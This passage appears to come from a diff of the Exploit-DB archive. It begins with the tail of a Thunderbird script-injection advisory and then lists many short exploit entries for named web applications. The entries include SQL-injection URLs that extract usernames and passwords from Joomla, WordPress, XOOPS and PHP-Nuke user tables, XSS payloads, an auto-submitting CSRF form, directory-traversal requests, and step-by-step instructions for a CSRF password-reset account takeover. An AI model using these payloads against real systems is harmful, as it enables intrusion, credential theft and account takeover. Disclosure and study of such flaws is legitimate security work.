{file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messenger.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messenger.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/folderDisplay.js" line: 1621}]
[JavaScript Warning: "The character encoding of a framed document was not declared. The document may appear different if viewed without the document framing it."
{file: "data:text/html;base64,PHNjcmlwdD5hbGVydCgiTW96aWxsYS1UaHVuZGVyYmlyZC1TY3JpcHQtQ29kZS1JbmplY3Rpb24tUE9DLUF0ZWVxLUtoYW4iKTs8L3NjcmlwdD4=" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://global/content/bindings/toolbar.xml" line: 276}]
"chrome://global/content/bindings/general.xml" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
No chrome package registered for chrome://navigator/content/navigator.xul
[JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64,
PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlByaXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nlc3MiKTsKZm9
yICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50LndyaXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdmlsZWdlTWFuYW
dlci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2xvc2UoKTsKPC9TQ1JJUFQ+" line: 2}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
No chrome package registered for chrome://navigator/content/navigator.xul
[JavaScript Error: "NS_ERROR_FAILURE: Component returned failure code: 0x80004005 (NS_ERROR_FAILURE) [nsIDOMJSWindow.open]" {file: "data:text/html;base64,
PFNDUklQVD4KdmFyIHdpbiA9IHdpbmRvdy5vcGVuKCk7Cm5ldHNjYXBlLnNlY3VyaXR5LlByaXZpbGVnZU1hbmFnZXIuZW5hYmxlUHJpdmlsZWdlKAogIlVuaXZlcnNhbEJyb3dzZXJBY2Nlc3MiKTsKZm9y
ICh2YXIgaT0wOyBpIDwgaGlzdG9yeS5sZW5ndGg7IGkrKykgewogd2luLmRvY3VtZW50LndyaXRlbG4oaGlzdG9yeVtpXSArICI8QlI+Iik7Cn0KbmV0c2NhcGUuc2VjdXJpdHkuUHJpdmlsZWdlTWFuYWdl
ci5yZXZlcnRQcml2aWxlZ2UoCiAiVW5pdmVyc2FsQnJvd3NlckFjY2VzcyIpOwp3aW4uY2xvc2UoKTsKPC9TQ1JJUFQ+" line: 2}]
[JavaScript Error: "An error occurred executing the cmd_insertHTMLWithDialog command: [Exception... "Could not convert Native argument arg 3
[nsIDOMJSWindow.openDialog]" nsresult: "0x8057000a (NS_ERROR_XPC_BAD_CONVERT_NATIVE)" location: "JS frame :: chrome://editor/content/ComposerCommands.js
:: <TOP_LEVEL> :: line 2790" data: no]" {file: "chrome://global/content/globalOverlay.js" line: 95}]
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
Security Error: Content at moz-nullprincipal:{37db781d-d6d3-44bb-ade4-a79dcc63c0dd} may not load or link to about:blank.
Security Error: Content at moz-nullprincipal:{44bab10a-4bd8-4cfb-a519-eb2535344039} may not load or link to about:blank
[JavaScript Error: "[Exception... "'DB failed getting form autocomplete values' when calling method: [nsIFormAutoComplete::autoCompleteSearch]"
nsresult: "0x8057001e (NS_ERROR_XPC_JS_THREW_STRING)" location: "<unknown>" data: no]"]
[JavaScript Error: "aSubject.popup is undefined" {file: "resource:///modules/glodaWebSearch.js" line: 68}]
[JavaScript Warning: "The stylesheet data:,*%7bx:<script>alert(1)</script>askjn</h1>expression(write(2))%7D was loaded as CSS even though its MIME type,
"text/plain", is not "text/css"." {file: "about:blank" line: 0}]
[JavaScript Warning: "Unknown property 'x'. Declaration dropped." {file: "data:,*%7bx:<script>alert(1)</script>askjn</h1>expression(write(2))%7D" line: 1]
[JavaScript Error: "GenericSendMessage FAILED: [Exception... "Component returned failure code: 0x8055311a [nsIMsgCompose.SendMsg]"
nsresult: "0x8055311a (<unknown>)" location: "JS frame :: chrome://messenger/content/messengercompose/MsgComposeCommands.js :: GenericSendMessage ::
line 2814" data: no]" {file: "chrome://messenger/content/messengercompose/MsgComposeCommands.js" line: 2817}]
"chrome://messenger/content/messengercompose/messengercompose.xul" line: 0}]
[JavaScript Warning: "Use of attributes' nodeValue attribute is deprecated. Use value instead."
{file: "chrome://messenger/content/messengercompose/MsgComposeCommands.js" line: 3996}]
Security Error: Content at moz-nullprincipal:{549c3f5a-560d-4469-9b0f-09f598998b0b} may not load or link to about:blank.
Security Error: Content at moz-nullprincipal:{63e416e7-9cc4-458f-b93d-882bb2ad9121} may not load or link to about:blank.
[JavaScript Warning: "XUL box for _moz_generated_content_before element contained an inline #text child, forcing all its children to be wrapped in a block."
{file: "chrome://global/content/bindings/general.xml" line: 0}]
[JavaScript Error: "Search service falling back to synchronous initialization at SRCH_SVC__ensureInitialized@resource:///components/nsSearchService.js:2498
@resource:///components/nsSearchService.js:3476
_adjustAcItem@chrome://messenger/content/webSearch.xml:42
@chrome://messenger/content/webSearch.xml:22
[JavaScript Warning: "The stylesheet data:,*%7bx:<script>alert(1)</script>askjn</h1>expression(write(2))%7D
was loaded as CSS even though its MIME type, "text/plain", is not "text/css"." {file: "about:blank" line: 0}]
stylesheet was loaded successfully as text/plain even though it should have been.
Solution - Fix & Patch:
=======================
2014-01-18: Vendor Fix/Patch (Mozilla Developer Team - Reward 1.500$ SWB)
Security Risk:
==============
The security risk of the persistent input validation vulnerabilities and filter bypass is estimated as high(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq ur Rehman Khan (ateeq@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com

9
platforms/multiple/dos/31232.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27873/info
Foxit WAC Remote Access Server is prone to a heap-based buffer-overflow vulnerability.
Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will likely cause denial-of-service conditions.
This issue affects WAC Server 2.0 Build 3503 and prior versions.
http://www.exploit-db.com/sploits/31232.zip

9
platforms/multiple/remote/31106.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27614/info
WinComLPD Total is prone to multiple vulnerabilities, including buffer-overflow vulnerabilities and an authentication-bypass vulnerability.
Successfully exploiting these issues will allow an attacker to perform unauthorized actions or execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will likely crash the application.
These issues affect WinComLPD Total 3.0.2.623; other versions may also be vulnerable.
http://www.exploit-db.com/sploits/31106.zip

9
platforms/multiple/remote/31119.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27660/info
TinTin++ and WinTin++ are prone to multiple security vulnerabilities affecting the application's '#chat' functionality. These issues include a buffer-overflow vulnerability, a denial-of-service vulnerability, and a file-overwrite vulnerability.
Attackers can exploit these issues to execute arbitrary code, cause denial-of-service conditions, or overwrite files with arbitrary content.
These issues affect TinTin++ and WinTin++ 1.97.9; other versions may also be affected.
http://www.exploit-db.com/sploits/31119.tar.gz

10
platforms/multiple/webapps/31233.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/27875/info
webcamXP is prone to multiple information-disclosure and denial-of-service vulnerabilities because it fails to check user-supplied input data.
Attackers can exploit these issues to access potentially sensitive information or crash the application. Successful exploits could aid in further attacks or deny service to legitimate users.
These issues affect webcamXP 3.72.440 and 4.05.280 beta and prior versions.
http://www.example.com:8080/pocketpc?camnum=999999&mode=0
http://www.example.com:8080/pocketpc?camnum=-999999&mode=0

9
platforms/multiple/webapps/31234.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27875/info
webcamXP is prone to multiple information-disclosure and denial-of-service vulnerabilities because it fails to check user-supplied input data.
Attackers can exploit these issues to access potentially sensitive information or crash the application. Successful exploits could aid in further attacks or deny service to legitimate users.
These issues affect webcamXP 3.72.440 and 4.05.280 beta and prior versions.
http://www.example.com:8080/show_gallery_pic?id=999999

7
platforms/php/webapps/31224.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27851/info
The Joomla! and Mambo 'com_profile' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_profile&Itemid=s@bun&task=&task=viewoffer&oid=9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

17
platforms/php/webapps/31225.html Executable file
View file

@ -0,0 +1,17 @@
source: http://www.securityfocus.com/bid/27852/info
RunCMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
RunCMS 1.6.1 is vulnerable; other versions may also be affected.
<html><head></head><body onLoad="javascript:document.r.submit()">
<form action="http://localhost/xampp/runcms/modules/system/admin.php"
method="post" enctype="multipart/form-data" name="r">
<input type="text" class="text" name="rank_title" size="30" maxlength="50"
value="<marquee>Cross-Site Scritping :-("/>
<input type="hidden" name="fct" value="userrank">
<input type="hidden" name="op" value="RankForumAdd">
</form>
</body>

7
platforms/php/webapps/31226.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27853/info
The Joomla! and Mambo 'com_detail' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_detail&Itemid=s@bun&id=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C0x3a%2Cpassword%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmos_users%20%2F%2A%2A

7
platforms/php/webapps/31227.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27854/info
Simple Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/simple-forum/ahah/sf-profile.php?u=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C1%2C2%2C3%2C4%2Cconcat(0x7c,user_login,0x7c,user_pass,0x7c)%2C6%2C7%2C8%2C0x7c%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users

7
platforms/php/webapps/31228.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27856/info
The WordPress Recipes Blog plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/recipe/wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users

9
platforms/php/webapps/31229.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27857/info
ProjectPier is prone to multiple HTML-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ProjectPier 0.8.0 is vulnerable; prior versions may also be affected.
http://www.example.com/projectpier/index.php?c=access"><script>alert('xss')</script>&a=login"><script>alert(document.cookie)</script>

8
platforms/php/webapps/31230.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/27858/info
The WordPress 'wp-people' plugin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/wp-content/plugins/wp-people/wp-people-popup.php?person=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cuser_pass%2Cuser_login%2C3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users

10
platforms/php/webapps/31235.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/27876/info
Jinzora is prone to multiple HTML-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and launch other attacks.
Jinzora 2.7.5 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/index.php?frontend=<IMG SRC="javascript:alert(&#039;DSecRG XSS&#039;)">
http://www.example.com/[installdir]/index.php/"><script>alert(&#039;DSecRG XSS&#039;)</script>

9
platforms/php/webapps/31236.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27876/info
Jinzora is prone to multiple HTML-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and launch other attacks.
Jinzora 2.7.5 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/ajax_request.php?language=<IMG SRC="javascript:alert(&#039;DSecRG XSS&#039;)">

9
platforms/php/webapps/31237.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27876/info
Jinzora is prone to multiple HTML-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and launch other attacks.
Jinzora 2.7.5 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/slim.php?jz_path=<IMG SRC="javascript:alert(&#039;DSecRG XSS&#039;)">

11
platforms/php/webapps/31238.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/27876/info
Jinzora is prone to multiple HTML-injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, and launch other attacks.
Jinzora 2.7.5 is vulnerable; other versions may also be affected.
http://www.example.com/[installdir]/popup.php?ptype=sitenew&siteNewsData = &lt;/textarea&gt;<script>alert(&#039;DSecRG XSS&#039;)</script>
http://www.example.com/[installdir]/popup.php?ptype=playlistedit&query = <script>alert(&#039;DSecRG XSS&#039;)</script>
http://www.example.com/[installdir]/popup.php?theme=<IMG SRC="javascript:alert(&#039;DSecRG XSS&#039;)">

9
platforms/php/webapps/31239.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/27877/info
Google Hack Honeypot File Upload Manager is prone to an unauthorized file-access vulnerability. This issue occurs because the application fails to validate users before processing a certain HTTP request.
Attackers can exploit this issue to delete all files that have been uploaded to the application.
File Upload Manager 1.3 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/index.php?act=delall

10
platforms/php/webapps/31240.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/27878/info
SmarterMail is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input.
Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
SmarterMail Enterprise 4.3 is vulnerable; other versions may also be affected.
<XSS STYLE="xss:expression(alert(&#039;1&#039;))"><XSS
STYLE="xss:expression(alert(&#039;2&#039;))">

7
platforms/php/webapps/31241.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27879/info
The PHP-Nuke Sections module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xxxxSections&op=viewarticle&artid=-9999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%20%20/**/0,1,aid,pwd,4/**/from/**/nuke_authors/*where%20admin%20-2

7
platforms/php/webapps/31242.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27880/info
Facile Forms is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

7
platforms/php/webapps/31243.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27881/info
The 'com_team' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_team&gid=-1/**/union/**/select/**/1,2,3,password,5,6,7,8,9,10,username,12,13/**/from/**/jos_users/*

7
platforms/php/webapps/31244.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27883/info
The Joomla! and Mambo 'com_iigcatalog' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_iigcatalog&Itemid=56&act=viewCat&cat=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/mos_users/*

7
platforms/php/webapps/31245.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27884/info
The Joomla! and Mambo 'com_formtool' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_formtool&task=view&formid=2&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*

7
platforms/php/webapps/31246.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27887/info
The Joomla! and Mambo 'com_genealogy' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_genealogy&task=profile&id=-9999999/**/union/**/select/**/0,0x3a,2,0x3a,0x3a,5,0x3a,0x3a,8,concat(username,0x3a,password)/**/from/**/jos_users/*

7
platforms/php/webapps/31247.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27888/info
iJoomla 'com_magazine' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_magazine&task=guide&id=21&page=7&pageid=-9999999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,111,222,333,444,555/**/from/**/jos_users/**

7
platforms/php/webapps/31248.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27889/info
XOOPS 'vacatures' module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules/vacatures/index.php?pa=view&cid=-00000/**/union/**/select/**/0000,concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/**where%20admin%20-111

7
platforms/php/webapps/31249.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27890/info
The XOOPS 'events' module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules/events/index.php?op=show&id=-6666+union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from/**/xoops_users/*where%20admin%20-111

7
platforms/php/webapps/31250.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27891/info
The XOOPS 'seminars' module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules/seminars/index.php?op=show&id=-77777/**/union/**/select/**/0x3a,0x3a,0x3a,0x3a,uname,pass,0x3a,0x3a,0x3a/**/from/**/xoops_users/*where%20admin

7
platforms/php/webapps/31251.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27892/info
The XOOPS 'badliege' module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules/badliege/index.php?op=show&id=-9999999/**/union/**/select/**/0x3a,0x3a,0x3a,uname,pass/**/from+xoops_users/*where%20admin%20-5

7
platforms/php/webapps/31252.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/27894/info
The PHP-Nuke Web_Links module is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=-00000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(aid,0x3a,pwd),char(111,112,101,114,110,97,108,101,51)/**/from%2F%2A%2A%2Fnuke_authors/*where%20admin%201=%202

4130
platforms/windows/dos/31222.py Executable file
View file

File diff suppressed because it is too large Load diff

10
platforms/windows/remote/31231.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/27872/info
SCI Photo Chat is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting this issue may allow an attacker to access sensitive information that could aid in further attacks.
This issue affects SCI Photo Chat 3.4.9 and prior versions.
GET /docs/..\..\..\..\..\boot.ini HTTP/1.0
GET /docs/../../../../../boot.ini HTTP/1.0

43
platforms/windows/webapps/31221.txt Executable file
View file

@ -0,0 +1,43 @@
*On one machine (Windows Server 2003), install a new instance of AMS with
these configurations*
1. Primary Domain: hack.local
2. Enable the WebMail Service
3. Domain Name: hack.local
4. Add a User and set Password. In this case I created a user named,
victim, with a password of victim
5. Finish installation
*On an instance of Kali*
1. Open a web browser and navigate to AMS WebMail Login
2. Log in as the user victim
3. Go to Options -> Advanced Options
4. Verify that the Password Resetting section is blank
5. Start Apache and place csrf-password_reset.js in /var/www/ability
6. As a sanity check, try to navigate to csrf-password_reset.js to make
sure you can access it, i.e. 192.168.1.1/ability/csrf-password_reset.js
7. Update resetpassword.py with the IP addresses of the server running
AMS and the kali attack machine. If the user/password account you created
in AMS is different, update that information here as well.
8. Run the script by typing, "python resetpassword.py"
9. Go back to your web browser, you should notice that victim now has an
email
10. Open the email
11. You should observe an alert box that says, Password Reset!
12. Click OK
13. Go to Options -> Advanced Options
14. Verify that the Password Resetting section is now populated with the
question and answer set to hacked
15. Logout of AMS
16. Click on Return to Login Page
17. Click on Forgot your password?
18. Enter an email address of victim@hack.local
19. Enter an answer of hacked and set a new password (you can leave zip
code and telephone number blank)
20. Click on Return to Login Page
21. Login as user victim with the password you have chosen
Proof of Concept Files:
http://www.exploit-db.com/sploits/31221.tar.gz